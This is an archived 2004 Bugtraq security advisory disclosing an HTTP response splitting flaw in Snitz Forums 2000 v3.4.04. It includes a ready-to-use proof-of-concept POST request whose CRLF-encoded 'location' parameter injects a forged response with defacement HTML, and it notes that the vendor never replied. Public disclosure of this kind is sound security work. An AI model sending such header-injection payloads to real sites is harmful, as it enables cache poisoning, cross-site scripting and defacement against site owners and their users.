lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040916150024.04B7BE5BC9@ws7-2.us4.outblaze.com>
Date: Thu, 16 Sep 2004 10:00:23 -0500
From: "Maestro De-Seguridad" <maestrodeseguridad@...os.com>
To: bugtraq@...urityfocus.com
Subject: ADVISORY: security hole (http response splitting) in snitz forums
    2000


ADVISORY
 
Author: Maestro (me!)
 
Date: 16-SEP-04
 
Vendor: Snitz Communications (www.snitz.com)
 
Product: Snitz Forums 2000 v3.4.04

Product description: (from vendor website) "the leading ASP forum/bbs on the internet today"

Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
 
Exploit:

POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134

location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}

(replace curly braces with lessthan and greaterthan)

Vendor status: vendor contacted several times (email to support@ and to the contact email in the code). No response from vendor.


-- 
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ